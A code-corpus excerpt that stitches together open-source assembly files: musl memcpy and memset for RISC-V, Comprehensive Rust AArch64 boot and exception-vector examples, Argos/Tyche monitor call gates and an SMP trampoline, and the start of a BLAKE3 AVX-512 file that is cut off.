sw a6, 4(a3)
sw a7, 8(a3)
sw t0, 12(a3)
addi a4, a4, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a1, a2, .LBBmemcpy0_14
.LBBmemcpy0_15:
andi a1, a2, 8
beqz a1, .LBBmemcpy0_17
lw a1, 0(a4)
lw a5, 4(a4)
sw a1, 0(a3)
sw a5, 4(a3)
addi a3, a3, 8
addi a4, a4, 8
.LBBmemcpy0_17:
andi a1, a2, 4
beqz a1, .LBBmemcpy0_30
lw a1, 0(a4)
sw a1, 0(a3)
addi a3, a3, 4
addi a4, a4, 4
j .LBBmemcpy0_30
.LBBmemcpy0_19:
lw a5, 0(a4)
addi a1, a3, 1
sb a5, 0(a3)
addi a2, a2, -1
addi a3, a4, 16
li a4, 18
.LBBmemcpy0_20:
lw a6, -12(a3)
srli a5, a5, 8
slli a7, a6, 24
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 8
slli a6, t0, 24
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 8
slli t0, a7, 24
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 8
slli a7, a5, 24
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_20
addi a4, a3, -15
j .LBBmemcpy0_25
.LBBmemcpy0_22:
lw a5, 0(a4)
sb a5, 0(a3)
srli a6, a5, 8
addi a1, a3, 2
sb a6, 1(a3)
addi a2, a2, -2
addi a3, a4, 16
li a4, 17
.LBBmemcpy0_23:
lw a6, -12(a3)
srli a5, a5, 16
slli a7, a6, 16
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 16
slli a6, t0, 16
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 16
slli t0, a7, 16
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 16
slli a7, a5, 16
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_23
addi a4, a3, -14
.LBBmemcpy0_25:
mv a3, a1
.LBBmemcpy0_26:
andi a1, a2, 16
bnez a1, .LBBmemcpy0_35
andi a1, a2, 8
bnez a1, .LBBmemcpy0_36
.LBBmemcpy0_28:
andi a1, a2, 4
beqz a1, .LBBmemcpy0_30
.LBBmemcpy0_29:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
addi a4, a4, 4
addi a5, a3, 4
sb a1, 3(a3)
mv a3, a5
.LBBmemcpy0_30:
andi a1, a2, 2
bnez a1, .LBBmemcpy0_33
andi a1, a2, 1
bnez a1, .LBBmemcpy0_34
.LBBmemcpy0_32:
ret
.LBBmemcpy0_33:
lb a1, 0(a4)
lb a5, 1(a4)
sb a1, 0(a3)
addi a4, a4, 2
addi a1, a3, 2
sb a5, 1(a3)
mv a3, a1
andi a1, a2, 1
beqz a1, .LBBmemcpy0_32
.LBBmemcpy0_34:
lb a1, 0(a4)
sb a1, 0(a3)
ret
.LBBmemcpy0_35:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
lb a5, 4(a4)
lb a6, 5(a4)
sb a1, 3(a3)
lb a1, 6(a4)
sb a5, 4(a3)
sb a6, 5(a3)
lb a5, 7(a4)
sb a1, 6(a3)
lb a1, 8(a4)
lb a6, 9(a4)
sb a5, 7(a3)
lb a5, 10(a4)
sb a1, 8(a3)
sb a6, 9(a3)
lb a1, 11(a4)
sb a5, 10(a3)
lb a5, 12(a4)
lb a6, 13(a4)
sb a1, 11(a3)
lb a1, 14(a4)
sb a5, 12(a3)
sb a6, 13(a3)
lb a5, 15(a4)
sb a1, 14(a3)
addi a4, a4, 16
addi a1, a3, 16
sb a5, 15(a3)
mv a3, a1
andi a1, a2, 8
beqz a1, .LBBmemcpy0_28
.LBBmemcpy0_36:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
lb a5, 4(a4)
lb a6, 5(a4)
sb a1, 3(a3)
lb a1, 6(a4)
sb a5, 4(a3)
sb a6, 5(a3)
lb a5, 7(a4)
sb a1, 6(a3)
addi a4, a4, 8
addi a1, a3, 8
sb a5, 7(a3)
mv a3, a1
andi a1, a2, 4
bnez a1, .LBBmemcpy0_29
j .LBBmemcpy0_30
.Lfuncmemcpy_end0:
.size memcpy, .Lfuncmemcpy_end0-memcpy
.ident "Ubuntu clang version 14.0.6-++20220622053131+f28c006a5895-1~exp1~20220622173215.157"
.section ".note.GNU-stack","",@progbits
.addrsig |
mintair-xyz/succinct-sp1 | 8,450 | crates/zkvm/entrypoint/src/memset.s | // This is musl-libc memset commit 37e18b7bf307fa4a8c745feebfcba54a0ba74f30:
//
// src/string/memset.c
//
// This was compiled into assembly with:
//
// clang-14 -target riscv32 -march=rv32im -O3 -S memset.c -nostdlib -fno-builtin -funroll-loops
//
// and labels manually updated to not conflict.
//
// musl as a whole is licensed under the following standard MIT license:
//
// ----------------------------------------------------------------------
// Copyright © 2005-2020 Rich Felker, et al.
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
// IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
// CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
// TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
// SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
// ----------------------------------------------------------------------
//
// Authors/contributors include:
//
// A. Wilcox
// Ada Worcester
// Alex Dowad
// Alex Suykov
// Alexander Monakov
// Andre McCurdy
// Andrew Kelley
// Anthony G. Basile
// Aric Belsito
// Arvid Picciani
// Bartosz Brachaczek
// Benjamin Peterson
// Bobby Bingham
// Boris Brezillon
// Brent Cook
// Chris Spiegel
// Clément Vasseur
// Daniel Micay
// Daniel Sabogal
// Daurnimator
// David Carlier
// David Edelsohn
// Denys Vlasenko
// Dmitry Ivanov
// Dmitry V. Levin
// Drew DeVault
// Emil Renner Berthing
// Fangrui Song
// Felix Fietkau
// Felix Janda
// Gianluca Anzolin
// Hauke Mehrtens
// He X
// Hiltjo Posthuma
// Isaac Dunham
// Jaydeep Patil
// Jens Gustedt
// Jeremy Huntwork
// Jo-Philipp Wich
// Joakim Sindholt
// John Spencer
// Julien Ramseier
// Justin Cormack
// Kaarle Ritvanen
// Khem Raj
// Kylie McClain
// Leah Neukirchen
// Luca Barbato
// Luka Perkov
// M Farkas-Dyck (Strake)
// Mahesh Bodapati
// Markus Wichmann
// Masanori Ogino
// Michael Clark
// Michael Forney
// Mikhail Kremnyov
// Natanael Copa
// Nicholas J. Kain
// orc
// Pascal Cuoq
// Patrick Oppenlander
// Petr Hosek
// Petr Skocik
// Pierre Carrier
// Reini Urban
// Rich Felker
// Richard Pennington
// Ryan Fairfax
// Samuel Holland
// Segev Finer
// Shiz
// sin
// Solar Designer
// Stefan Kristiansson
// Stefan O'Rear
// Szabolcs Nagy
// Timo Teräs
// Trutz Behn
// Valentin Ochs
// Will Dietz
// William Haddon
// William Pitcock
//
// Portions of this software are derived from third-party works licensed
// under terms compatible with the above MIT license:
//
// The TRE regular expression implementation (src/regex/reg* and
// src/regex/tre*) is Copyright © 2001-2008 Ville Laurikari and licensed
// under a 2-clause BSD license (license text in the source files). The
// included version has been heavily modified by Rich Felker in 2012, in
// the interests of size, simplicity, and namespace cleanliness.
//
// Much of the math library code (src/math/* and src/complex/*) is
// Copyright © 1993,2004 Sun Microsystems or
// Copyright © 2003-2011 David Schultz or
// Copyright © 2003-2009 Steven G. Kargl or
// Copyright © 2003-2009 Bruce D. Evans or
// Copyright © 2008 Stephen L. Moshier or
// Copyright © 2017-2018 Arm Limited
// and labelled as such in comments in the individual source files. All
// have been licensed under extremely permissive terms.
//
// The ARM memcpy code (src/string/arm/memcpy.S) is Copyright © 2008
// The Android Open Source Project and is licensed under a two-clause BSD
// license. It was taken from Bionic libc, used on Android.
//
// The AArch64 memcpy and memset code (src/string/aarch64/*) are
// Copyright © 1999-2019, Arm Limited.
//
// The implementation of DES for crypt (src/crypt/crypt_des.c) is
// Copyright © 1994 David Burren. It is licensed under a BSD license.
//
// The implementation of blowfish crypt (src/crypt/crypt_blowfish.c) was
// originally written by Solar Designer and placed into the public
// domain. The code also comes with a fallback permissive license for use
// in jurisdictions that may not recognize the public domain.
//
// The smoothsort implementation (src/stdlib/qsort.c) is Copyright © 2011
// Valentin Ochs and is licensed under an MIT-style license.
//
// The x86_64 port was written by Nicholas J. Kain and is licensed under
// the standard MIT terms.
//
// The mips and microblaze ports were originally written by Richard
// Pennington for use in the ellcc project. The original code was adapted
// by Rich Felker for build system and code conventions during upstream
// integration. It is licensed under the standard MIT terms.
//
// The mips64 port was contributed by Imagination Technologies and is
// licensed under the standard MIT terms.
//
// The powerpc port was also originally written by Richard Pennington,
// and later supplemented and integrated by John Spencer. It is licensed
// under the standard MIT terms.
//
// All other files which have no copyright comments are original works
// produced specifically for use as part of this library, written either
// by Rich Felker, the main author of the library, or by one or more
// contributors listed above. Details on authorship of individual files
// can be found in the git version control history of the project. The
// omission of copyright and license comments in each file is in the
// interest of source tree size.
//
// In addition, permission is hereby granted for all public header files
// (include/* and arch/* /bits/* ) and crt files intended to be linked into
// applications (crt/*, ldso/dlstart.c, and arch/* /crt_arch.h) to omit
// the copyright notice and permission notice otherwise required by the
// license, and to use these files without any requirement of
// attribution. These files include substantial contributions from:
//
// Bobby Bingham
// John Spencer
// Nicholas J. Kain
// Rich Felker
// Richard Pennington
// Stefan Kristiansson
// Szabolcs Nagy
//
// all of whom have explicitly granted such permission.
//
// This file previously contained text expressing a belief that most of
// the files covered by the above exception were sufficiently trivial not
// to be subject to copyright, resulting in confusion over whether it
// negated the permissions granted in the license. In the spirit of
// permissive licensing, and of not having licensing issues being an
// obstacle to adoption, that text has been removed.
.text
.attribute 4, 16
.attribute 5, "rv32im"
.file "musl_memset.c"
.globl memset
.p2align 2
.type memset,@function
memset:
beqz a2, .LBB0_9memset
sb a1, 0(a0)
add a3, a2, a0
li a4, 3
sb a1, -1(a3)
bltu a2, a4, .LBB0_9memset
sb a1, 1(a0)
sb a1, 2(a0)
sb a1, -2(a3)
li a4, 7
sb a1, -3(a3)
bltu a2, a4, .LBB0_9memset
sb a1, 3(a0)
li a5, 9
sb a1, -4(a3)
bltu a2, a5, .LBB0_9memset
neg a3, a0
andi a4, a3, 3
add a3, a0, a4
sub a2, a2, a4
andi a2, a2, -4
andi a1, a1, 255
lui a4, 4112
addi a4, a4, 257
mul a1, a1, a4
sw a1, 0(a3)
add a4, a3, a2
sw a1, -4(a4)
bltu a2, a5, .LBB0_9memset
sw a1, 4(a3)
sw a1, 8(a3)
sw a1, -12(a4)
li a5, 25
sw a1, -8(a4)
bltu a2, a5, .LBB0_9memset
sw a1, 12(a3)
sw a1, 16(a3)
sw a1, 20(a3)
sw a1, 24(a3)
sw a1, -28(a4)
sw a1, -24(a4)
sw a1, -20(a4)
andi a5, a3, 4
ori a5, a5, 24
sub a2, a2, a5
li a6, 32
sw a1, -16(a4)
bltu a2, a6, .LBB0_9memset
add a3, a3, a5
li a4, 31
.LBB0_8memset:
sw a1, 0(a3)
sw a1, 4(a3)
sw a1, 8(a3)
sw a1, 12(a3)
sw a1, 16(a3)
sw a1, 20(a3)
sw a1, 24(a3)
sw a1, 28(a3)
addi a2, a2, -32
addi a3, a3, 32
bltu a4, a2, .LBB0_8memset
.LBB0_9memset:
ret
.Lfunc_end0memset:
.size memset, .Lfunc_end0memset-memset
.ident "Ubuntu clang version 14.0.6-++20220622053131+f28c006a5895-1~exp1~20220622173215.157"
.section ".note.GNU-stack","",@progbits
.addrsig |
MissBiwott25/comprehensive-rust. | 4,676 | src/bare-metal/aps/examples/src/exceptions.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Saves the volatile registers onto the stack. This currently takes
* 14 instructions, so it can be used in exception handlers with 18
* instructions left.
*
* On return, x0 and x1 are initialised to elr_el2 and spsr_el2
* respectively, which can be used as the first and second arguments
* of a subsequent call.
*/
.macro save_volatile_to_stack
/* Reserve stack space and save registers x0-x18, x29 & x30. */
stp x0, x1, [sp, #-(8 * 24)]!
stp x2, x3, [sp, #8 * 2]
stp x4, x5, [sp, #8 * 4]
stp x6, x7, [sp, #8 * 6]
stp x8, x9, [sp, #8 * 8]
stp x10, x11, [sp, #8 * 10]
stp x12, x13, [sp, #8 * 12]
stp x14, x15, [sp, #8 * 14]
stp x16, x17, [sp, #8 * 16]
str x18, [sp, #8 * 18]
stp x29, x30, [sp, #8 * 20]
/*
* Save elr_el1 & spsr_el1. This such that we can take nested
* exception and still be able to unwind.
*/
mrs x0, elr_el1
mrs x1, spsr_el1
stp x0, x1, [sp, #8 * 22]
.endm
/**
* Restores the volatile registers from the stack. This currently
* takes 14 instructions, so it can be used in exception handlers
* while still leaving 18 instructions left; if paired with
* save_volatile_to_stack, there are 4 instructions to spare.
*/
.macro restore_volatile_from_stack
/* Restore registers x2-x18, x29 & x30. */
ldp x2, x3, [sp, #8 * 2]
ldp x4, x5, [sp, #8 * 4]
ldp x6, x7, [sp, #8 * 6]
ldp x8, x9, [sp, #8 * 8]
ldp x10, x11, [sp, #8 * 10]
ldp x12, x13, [sp, #8 * 12]
ldp x14, x15, [sp, #8 * 14]
ldp x16, x17, [sp, #8 * 16]
ldr x18, [sp, #8 * 18]
ldp x29, x30, [sp, #8 * 20]
/*
* Restore registers elr_el1 & spsr_el1, using x0 & x1 as scratch.
*/
ldp x0, x1, [sp, #8 * 22]
msr elr_el1, x0
msr spsr_el1, x1
/* Restore x0 & x1, and release stack space. */
ldp x0, x1, [sp], #8 * 24
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SP0. It behaves similarly to the SPx case by first
* switching to SPx, doing the work, then switching back to SP0 before
* returning.
*
* Switching to SPx and calling the Rust handler takes 16
* instructions. To restore and return we need an additional 16
* instructions, so we can implement the whole handler within the
* allotted 32 instructions.
*
*/
.macro current_exception_sp0 handler:req
msr spsel, #1
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
msr spsel, #0
eret
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SPx. It saves volatile registers, calls the Rust
* handler, restores volatile registers, then returns.
*
* This also works for exceptions taken from EL0, if we don't care
* about non-volatile registers.
*
* Saving state and jumping to the Rust handler takes 15 instructions,
* and restoring and returning also takes 15 instructions, so we can
* fit the whole handler in 30 instructions, under the limit of 32.
*/
.macro current_exception_spx handler:req
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
eret
.endm
.section .text.vector_table_el1, "ax"
.global vector_table_el1
.balign 0x800
vector_table_el1:
sync_cur_sp0:
current_exception_sp0 sync_exception_current
.balign 0x80
irq_cur_sp0:
current_exception_sp0 irq_current
.balign 0x80
fiq_cur_sp0:
current_exception_sp0 fiq_current
.balign 0x80
serr_cur_sp0:
current_exception_sp0 serr_current
.balign 0x80
sync_cur_spx:
current_exception_spx sync_exception_current
.balign 0x80
irq_cur_spx:
current_exception_spx irq_current
.balign 0x80
fiq_cur_spx:
current_exception_spx fiq_current
.balign 0x80
serr_cur_spx:
current_exception_spx serr_current
.balign 0x80
sync_lower_64:
current_exception_spx sync_lower
.balign 0x80
irq_lower_64:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_64:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_64:
current_exception_spx serr_lower
.balign 0x80
sync_lower_32:
current_exception_spx sync_lower
.balign 0x80
irq_lower_32:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_32:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_32:
current_exception_spx serr_lower
|
MissBiwott25/comprehensive-rust. | 1,445 | src/bare-metal/aps/examples/src/idmap.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.set .L_TT_TYPE_BLOCK, 0x1
.set .L_TT_TYPE_PAGE, 0x3
.set .L_TT_TYPE_TABLE, 0x3
/* Access flag. */
.set .L_TT_AF, 0x1 << 10
/* Not global. */
.set .L_TT_NG, 0x1 << 11
.set .L_TT_XN, 0x3 << 53
.set .L_TT_MT_DEV, 0x0 << 2 // MAIR #0 (DEV_nGnRE)
.set .L_TT_MT_MEM, (0x1 << 2) | (0x3 << 8) // MAIR #1 (MEM_WBWA), inner shareable
.set .L_BLOCK_DEV, .L_TT_TYPE_BLOCK | .L_TT_MT_DEV | .L_TT_AF | .L_TT_XN
.set .L_BLOCK_MEM, .L_TT_TYPE_BLOCK | .L_TT_MT_MEM | .L_TT_AF | .L_TT_NG
.section ".rodata.idmap", "a", %progbits
.global idmap
.align 12
idmap:
/* level 1 */
.quad .L_BLOCK_DEV | 0x0 // 1 GiB of device mappings
.quad .L_BLOCK_MEM | 0x40000000 // 1 GiB of DRAM
.fill 254, 8, 0x0 // 254 GiB of unmapped VA space
.quad .L_BLOCK_DEV | 0x4000000000 // 1 GiB of device mappings
.fill 255, 8, 0x0 // 255 GiB of remaining VA space
|
MissBiwott25/comprehensive-rust. | 4,768 | src/bare-metal/aps/examples/src/entry.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.macro adr_l, reg:req, sym:req
adrp \reg, \sym
add \reg, \reg, :lo12:\sym
.endm
.macro mov_i, reg:req, imm:req
movz \reg, :abs_g3:\imm
movk \reg, :abs_g2_nc:\imm
movk \reg, :abs_g1_nc:\imm
movk \reg, :abs_g0_nc:\imm
.endm
.set .L_MAIR_DEV_nGnRE, 0x04
.set .L_MAIR_MEM_WBWA, 0xff
.set .Lmairval, .L_MAIR_DEV_nGnRE | (.L_MAIR_MEM_WBWA << 8)
/* 4 KiB granule size for TTBR0_EL1. */
.set .L_TCR_TG0_4KB, 0x0 << 14
/* 4 KiB granule size for TTBR1_EL1. */
.set .L_TCR_TG1_4KB, 0x2 << 30
/*
* Disable translation table walk for TTBR1_EL1, generating a
* translation fault instead.
*/
.set .L_TCR_EPD1, 0x1 << 23
/* Translation table walks for TTBR0_EL1 are inner sharable. */
.set .L_TCR_SH_INNER, 0x3 << 12
/*
* Translation table walks for TTBR0_EL1 are outer write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_OWB, 0x1 << 10
/*
* Translation table walks for TTBR0_EL1 are inner write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_IWB, 0x1 << 8
/* Size offset for TTBR0_EL1 is 2**39 bytes (512 GiB). */
.set .L_TCR_T0SZ_512, 64 - 39
.set .Ltcrval, .L_TCR_TG0_4KB | .L_TCR_TG1_4KB | .L_TCR_EPD1 | .L_TCR_RGN_OWB
.set .Ltcrval, .Ltcrval | .L_TCR_RGN_IWB | .L_TCR_SH_INNER | .L_TCR_T0SZ_512
/* Stage 1 instruction access cacheability is unaffected. */
.set .L_SCTLR_ELx_I, 0x1 << 12
/* SP alignment fault if SP is not aligned to a 16 byte boundary. */
.set .L_SCTLR_ELx_SA, 0x1 << 3
/* Stage 1 data access cacheability is unaffected. */
.set .L_SCTLR_ELx_C, 0x1 << 2
/* EL0 and EL1 stage 1 MMU enabled. */
.set .L_SCTLR_ELx_M, 0x1 << 0
/*
* Privileged Access Never is unchanged on taking an exception to EL1.
*/
.set .L_SCTLR_EL1_SPAN, 0x1 << 23
/* SETEND instruction disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_SED, 0x1 << 8
/* Various IT instructions are disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_ITD, 0x1 << 7
.set .L_SCTLR_EL1_RES1, (0x1 << 11) | (0x1 << 20) | (0x1 << 22) | (0x1 << 28) | (0x1 << 29)
.set .Lsctlrval, .L_SCTLR_ELx_M | .L_SCTLR_ELx_C | .L_SCTLR_ELx_SA | .L_SCTLR_EL1_ITD | .L_SCTLR_EL1_SED
.set .Lsctlrval, .Lsctlrval | .L_SCTLR_ELx_I | .L_SCTLR_EL1_SPAN | .L_SCTLR_EL1_RES1
// ANCHOR: entry
/**
* This is a generic entry point for an image. It carries out the
* operations required to prepare the loaded image to be run.
* Specifically, it
*
* - sets up the MMU with an identity map of virtual to physical
* addresses, and enables caching
* - enables floating point
* - zeroes the bss section using registers x25 and above
* - prepares the stack, pointing to a section within the image
* - sets up the exception vector
* - branches to the Rust `main` function
*
* It preserves x0-x3 for the Rust entry point, as these may contain
* boot parameters.
*/
.section .init.entry, "ax"
.global entry
entry:
/*
* Load and apply the memory management configuration, ready to
* enable MMU and caches.
*/
adrp x30, idmap
msr ttbr0_el1, x30
mov_i x30, .Lmairval
msr mair_el1, x30
mov_i x30, .Ltcrval
/* Copy the supported PA range into TCR_EL1.IPS. */
mrs x29, id_aa64mmfr0_el1
bfi x30, x29, #32, #4
msr tcr_el1, x30
mov_i x30, .Lsctlrval
/*
* Ensure everything before this point has completed, then
* invalidate any potentially stale local TLB entries before they
* start being used.
*/
isb
tlbi vmalle1
ic iallu
dsb nsh
isb
/*
* Configure sctlr_el1 to enable MMU and cache and don't proceed
* until this has completed.
*/
msr sctlr_el1, x30
isb
/* Disable trapping floating point access in EL1. */
mrs x30, cpacr_el1
orr x30, x30, #(0x3 << 20)
msr cpacr_el1, x30
isb
/* Zero out the bss section. */
adr_l x29, bss_begin
adr_l x30, bss_end
0: cmp x29, x30
b.hs 1f
stp xzr, xzr, [x29], #16
b 0b
1: /* Prepare the stack. */
adr_l x30, boot_stack_end
mov sp, x30
/* Set up exception vector. */
adr x30, vector_table_el1
msr vbar_el1, x30
/* Call into Rust code. */
bl main
/* Loop forever waiting for interrupts. */
2: wfi
b 2b
|
mit-enclaves/argos-monitor | 1,088 | crates/bricks/src/x86_64/entry.S | .text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
pushq %rdi
pushq %rsi
movq (%rdi), %rdi
movq (%rsi), %rsi
movq $9, %rax // TYCHE_SWITCH s
vmcall
// We returned, move the return values into the registers.
popq %r15 // &rsi, i.e., void**
movq %rsi, (%r15)
popq %r15 // &rdi, i.e., capa_index_t*
movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl bricks_start
bricks_start:
movq %r11, %rsi
// Aligning the stack to 16 bytes, had bug with xmm registers
andl $-16, %esp
callq bricks_trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
|
mit-enclaves/argos-monitor | 3,305 | monitor/first-stage/src/smp/trampoline.S | # Upon receiving a SIPI from BSP, the AP starts in real mode with CS:IP set to XY00:0000.
# The assembly here tries to enter long mode directly from real mode (skipping protected mode)
#
# Useful links:
# - https://wiki.osdev.org/Symmetric_Multiprocessing#AP_Initialization_Code
# - https://wiki.osdev.org/Entering_Long_Mode_Directly
# - https://stackoverflow.com/questions/36968829/how-to-switch-from-real-mode-to-protected-mode-after-bootloader
# Special thanks to: https://github.com/rcore-os/x86-smpboot
.equ start_addr, 0x7000
.equ ap_trampoline64_start_paddr, start_addr + ap_trampoline64_start - ap_trampoline_start
.equ gdt_64_paddr, start_addr + gdt_64 - ap_trampoline_start
.equ gdt_64_ptr_paddr, start_addr + gdt_64_ptr - ap_trampoline_start
.equ CR0_PE, (1 << 0)
.equ CR0_PG, (1 << 31)
.equ CR4_PAE, (1 << 5)
.equ CR4_PGE, (1 << 7)
.equ EFER_LME, (1 << 8)
.equ EFER_NXE, (1 << 11)
.equ EFER_SCE, (1 << 0)
.global ap_trampoline_start
.global ap_trampoline_end
.equ cr3_ptr, start_addr + 0x0ff8
.equ entry_ptr, start_addr + 0x0ff0
.equ stack_ptr, start_addr + 0x0fe8
.equ temp_stack_ptr, start_addr + 0x0fe0
.text
.code16 # 16-bit mode
ap_trampoline_start:
# disable BIOS enabled interrupts
cli
# write back and invalidate cache
wbinvd
# zero out data segment registers DS, ES, and SS
xor ax, ax # ax
mov ds, ax # data segment
mov es, ax # extra segment
mov ss, ax # stack segment
# load idt with 0, 0 so that any NMI will cause a triple fault
# mov eax, idt_zero
# lidt [eax]
# cr4: enable PAE and PGE (0xa0)
mov eax, cr4
or eax, 0xa0
mov cr4, eax
# load cr3
mov eax, cr3_ptr
mov eax, [eax]
mov cr3, eax
# EFER: enable LME and NXE
mov ecx, 0xC0000080
rdmsr
or eax, EFER_LME | EFER_NXE | EFER_SCE
wrmsr
# cr0: enable PE and PG (CR0_PE | CR0_PG)
mov eax, 1
shl eax, 31
or eax, 1
mov ebx, cr0
or ebx, eax
mov cr0, ebx
# lgdt: load 64-bit GDT
lgdt [gdt_64_ptr_paddr]
# esp: point to temporary stack
mov esp, temp_stack_ptr
# jump to long mode directly
push 0x8
lea eax, [ap_trampoline64_start_paddr]
push eax
retf
.code64
ap_trampoline64_start:
# zero out data segment registers DS, ES, SS, FS, GS, SS
xor ax, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
# enter the entry function
mov rsp, [stack_ptr]
mov rax, [entry_ptr]
call rax
spin_hlt:
hlt
jmp spin_hlt
gdt_64:
.quad 0x0000000000000000 # NULL-segment descriptor (mandatory)
.quad 0x00209A0000000000 # Code segment descriptor (required to switch to protected mode)
.quad 0x0000920000000000 # Data segment descriptor (access data in memory after switching to protected mode)
.align 4
.word 0 # Padding to make the address of the GDT aligned on a 4-byte boundary
gdt_64_ptr:
.word gdt_64_ptr - gdt_64 - 1 # 16-bit Size (Limit) of GDT.
.long gdt_64_paddr # 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
ap_trampoline_end:
|
mit-enclaves/argos-monitor | 1,061 | C/libraries/sdktyche/runtime/asm.S | #if defined CONFIG_X86 || defined(__x86_64__)
.text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
//pushq %rdi
//pushq %rsi
//movq (%rdi), %rdi
//movq (%rsi), %rsi
movq $8, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
//popq %r15 // &rsi, i.e., void**
//movq %rsi, (%r15)
//popq %r15 // &rdi, i.e., capa_index_t*
//movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl _start
_start:
//movq %r11, %rsi
callq trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
#endif
|
mit-enclaves/argos-monitor | 161,672 | C/libraries/sdktyche/loader/blake3_avx512_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx512
.global blake3_hash_many_avx512
.global blake3_compress_in_place_avx512
.global _blake3_compress_in_place_avx512
.global blake3_compress_xof_avx512
.global _blake3_compress_xof_avx512
.global blake3_xof_many_avx512
.global _blake3_xof_many_avx512
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx512:
blake3_hash_many_avx512:
